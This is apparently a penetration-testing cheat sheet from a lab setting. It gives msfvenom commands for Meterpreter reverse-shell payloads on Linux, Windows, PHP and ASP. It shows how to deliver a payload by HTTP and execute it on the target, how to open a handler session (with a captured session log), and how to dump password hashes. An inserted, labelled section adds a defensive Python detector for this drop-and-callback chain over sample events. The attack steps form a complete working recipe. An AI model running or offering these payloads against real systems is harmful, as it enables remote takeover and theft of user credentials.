Reverse shell
Generate executable
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
Transfer to target machines
Python
server: python3 -m http.server 9000
target: http://<ip_server>:9000/rev_shell.elf
On the target machines
Execute the downloaded file
chmod +x rev_shell.elf
./rev_shell.elf
Get a meterpreter session
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <ip_server>
set LPORT <port_defined_msfvenom_command>
run
The payload must be the same as the one used to generate the reverse shell executable (here linux/x86/meterpreter/reverse_tcp).
[*] Started reverse TCP handler on 10.10.192.190:6666
[*] Sending stage (1017704 bytes) to 10.10.64.31
[*] Meterpreter session 1 opened (10.10.192.190:6666 -> 10.10.64.31:51156) at 2024-05-11 11:18:02 +0100
meterpreter >
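Seen from the defender's side, the steps above leave an ordered chain on a single file path: the file is written, made executable, executed, and then opens an outbound TCP connection. The following is an added example, not part of the original page, that correlates that chain over constructed telemetry; the log format, field names, addresses and the 10-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample telemetry in a hypothetical normalised format; not real tool output.
SAMPLE_EVENTS = """\
2024-05-11T11:17:31 write   path=/tmp/rev_shell.elf proc=wget
2024-05-11T11:17:40 chmod   path=/tmp/rev_shell.elf mode=0755
2024-05-11T11:17:58 exec    path=/tmp/rev_shell.elf pid=4242
2024-05-11T11:18:02 connect path=/tmp/rev_shell.elf pid=4242 dst=192.0.2.10:6666
2024-05-11T11:20:00 write   path=/tmp/report.txt proc=app
2024-05-11T11:20:05 chmod   path=/tmp/report.txt mode=0644
2024-05-11T11:21:00 exec    path=/usr/bin/curl pid=4300
2024-05-11T11:21:01 connect path=/usr/bin/curl pid=4300 dst=198.51.100.7:443
"""

STAGES = ["write", "chmod", "exec", "connect"]
LINE = re.compile(r"^(\S+)\s+(\w+)\s+(.*)$")

def parse(text):
    """Yield (timestamp, event_type, fields) for each well-formed line."""
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            ts, kind, rest = m.groups()
            fields = dict(kv.split("=", 1) for kv in rest.split() if "=" in kv)
            yield datetime.fromisoformat(ts), kind, fields

def find_drop_and_callback(text, window=timedelta(minutes=10)):
    """Alert on a file that is written, made executable, executed and then
    opens an outbound connection, in that order, inside `window`."""
    progress, alerts = {}, []  # progress: path -> (time of write, last stage index)
    for ts, kind, f in parse(text):
        path = f.get("path")
        if path is None or kind not in STAGES:
            continue
        idx = STAGES.index(kind)
        if idx == 0:
            progress[path] = (ts, 0)  # a fresh write restarts the chain
            continue
        start, last = progress.get(path, (None, -1))
        if last != idx - 1 or ts - start > window:
            continue  # stage out of order, or chain older than the window
        if kind == "chmod" and not int(f.get("mode", "0"), 8) & 0o111:
            continue  # mode change did not set any execute bit
        progress[path] = (start, idx)
        if kind == "connect":
            alerts.append({"path": path, "dst": f.get("dst"), "at": ts.isoformat()})
            del progress[path]
    return alerts
```

On the sample data only `/tmp/rev_shell.elf` is reported: the `0644` chmod and the pre-existing `/usr/bin/curl` binary never complete the chain.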
Bonus
Post-exploitation module to dump the password hashes of other users on the system
post/linux/gather/hashdump
meterpreter > run post/linux/gather/hashdump